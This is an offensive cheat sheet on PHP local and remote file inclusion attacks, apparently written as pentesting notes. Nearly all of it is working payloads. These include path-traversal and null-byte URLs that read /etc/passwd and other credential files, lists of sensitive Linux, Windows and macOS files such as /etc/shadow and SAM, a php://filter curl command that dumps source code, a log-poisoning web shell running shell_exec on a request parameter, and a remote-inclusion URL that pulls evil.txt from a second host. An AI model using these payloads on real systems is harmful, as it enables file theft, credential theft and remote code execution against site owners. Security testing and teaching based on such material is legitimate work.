File Inclusion Vulnerabilities
- fimap
There is a Python tool called fimap which can be leveraged to automate the exploitation of LFI/RFI vulnerabilities that are found in PHP (sqlmap for LFI): (https://github.com/kurobeats/fimap)
- **Gaining a shell from phpinfo() **fimap + phpinfo() Exploit
If a phpinfo() file is present, it’s usually possible to get a shell, if you don’t know the location of the phpinfo file fimap can probe for it, or you could use a tool like OWASP DirBuster.
- For Local File Inclusions look for the include() function in PHP code.
include("lang/".$\_COOKIE\['lang'\]);
include($\_GET\['page'\].".php");
- LFI - Encode and Decode a file using base64
curl -s \
"http://$ip/?page=<php://filter/convert.base64-encode/resource=index>" \
| grep -e '\\[^\\ \\]\\{40,\\}' | base64 -d
- LFI - Download file with base 64 encoding
http://$ip/index.php?page=<php://filter/convert.base64-encode/resource=admin.php>
- LFI Linux Files:
/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/passwd
/etc/shadow
/root/.bash_history
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root
- LFI Windows Files:
%SYSTEMROOT%\\repair\\system
%SYSTEMROOT%\\repair\\SAM
%SYSTEMROOT%\\repair\\SAM
%WINDIR%\\win.ini
%SYSTEMDRIVE%\\boot.ini
%WINDIR%\\Panther\\sysprep.inf
%WINDIR%\\system32\\config\\AppEvent.Evt
- LFI OSX Files:
/etc/fstab
/etc/master.passwd
/etc/resolv.conf
/etc/sudoers
/etc/sysctl.conf
- LFI - Download passwords file
http://$ip/index.php?page=/etc/passwd
http://$ip/index.php?file=../../../../etc/passwd
- LFI - Download passwords file with filter evasion
http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd
- Local File Inclusion - In versions of PHP below 5.3 we can terminate with null byte
GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
- Contaminating Log Files
<?php echo shell\_exec($\_GET\['cmd'\]);?>
-
For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini file must be configured to allow remote files
-
/etc/php5/cgi/php.ini* - "allow_url_fopen" and "allow_url_include" both set to "on"
include($\_REQUEST\["file"\].".php");
Remote File Inclusion
http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt
<?php echo shell_exec("ipconfig");?>